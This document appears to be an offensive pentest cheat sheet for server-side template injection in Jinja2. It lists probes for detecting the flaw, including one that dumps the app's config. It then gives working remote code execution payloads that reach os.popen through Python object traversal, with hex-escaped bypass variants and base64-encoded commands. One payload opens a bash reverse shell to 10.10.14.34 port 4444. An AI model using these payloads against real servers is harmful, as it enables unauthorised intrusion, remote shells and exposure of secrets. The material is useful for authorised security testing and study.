Jinja SSTI

SSTI => Server Side Template Injection

Jinja2

Detect
{{7*'7'}} # resolves to 7777777
{{7*a}} # will probably crash the app (HTTP 500 error)
{{config}} # dump config
{{'A'.lower()}} # resolves to 'a'
Execute a bash command through the os module:
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'ls'").read()}}{%endif%}{%endfor%}

{{request.application.__globals__.__builtins__.__import__('os').popen("id").read()}}

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls')|attr('read')()%}{%print(a)%}{%endwith%}
# Encoding the command as base64
echo -n ls | base64
bHM=

# Payload
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('echo bHM=|base64 -d|bash')|attr('read')()%}{%print(a)%}{%endwith%}
cat <<'EOF'|base64 -w 0
bash -i >& /dev/tcp/10.10.14.34/4444 0>&1
EOF

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNC80NDQ0IDA+JjEK|base64 -d|bash')|attr('read')()%}{%print(a)%}{%endwith%}

Tool